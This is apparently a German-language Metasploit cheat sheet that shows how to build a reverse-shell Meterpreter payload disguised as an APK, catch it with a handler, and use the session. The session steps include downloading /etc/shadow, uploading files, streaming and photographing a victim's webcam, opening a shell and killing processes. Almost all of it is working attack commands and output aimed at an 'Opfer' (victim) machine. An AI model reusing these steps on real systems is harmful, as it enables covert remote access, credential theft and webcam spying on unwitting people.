Android payloads checken
- msfvenom -l | grep android
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager
android/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell
android/meterpreter_reverse_tcp Connect back to the attacker and spawn a Meterpreter shell
android/shell/reverse_http Spawn a piped command shell (sh). Tunnel communication over HTTP
android/shell/reverse_https Spawn a piped command shell (sh). Tunnel communication over HTTPS
android/shell/reverse_tcp Spawn a piped command shell (sh). Connect back stager
Payload erstellen
- msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.81.1.91 LPORT=4444 -f apk > bug.apk
- cp shell.elf /var/www/html/
Payload auf den Opfer Rechner bringen und ausführen
Konsole starten
Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing
=[ metasploit v4.16.6-dev ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 10.81.1.91
LHOST => 10.81.1.91
- msf exploit(handler) > set LPORT 6666
LPORT => 6666
Starten des exploits
- msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.81.1.91:6666
Anzeigen der Sessions
- msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/windows shuttle\xinux @ SHUTTLE 10.81.1.91:4444 -> 10.81.70.36:50707 (10.81.70.36)
Wechseln in session
- msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Metapreter Datei Managment
pwd
cd
- meterpreter > cd ..
- meterpreter > cd /etc
Download
- meterpreter > download shadow
upload
- meterpreter > cd /root
- meterpreter > upload /etc/hosts
Webcam
list
- meterpreter > webcam_list
1: Integrated Camera
Live stream
- meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: XZLHwhtQ.html
[*] Streaming...
snap
- meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PDYSnlbK.jpeg
Starten einer Shell(Kein Shell Prompt)
Process 14779 created.
Channel 5 created.
- C:\Users\xinux\Downloads>
Beispiele Shell
- ifconfig
- route -n
- netstat -ltpn
Quit
Sysinfo
Computer : gustavo.xinux.lan
OS : Ubuntu 16.04 (Linux 4.4.0-97-generic)
Architecture : x64
Meterpreter : x64/linux
Kill a Prozess
- meterpreter > pkill notepad
Filtering on 'notepad'
Killing: 3240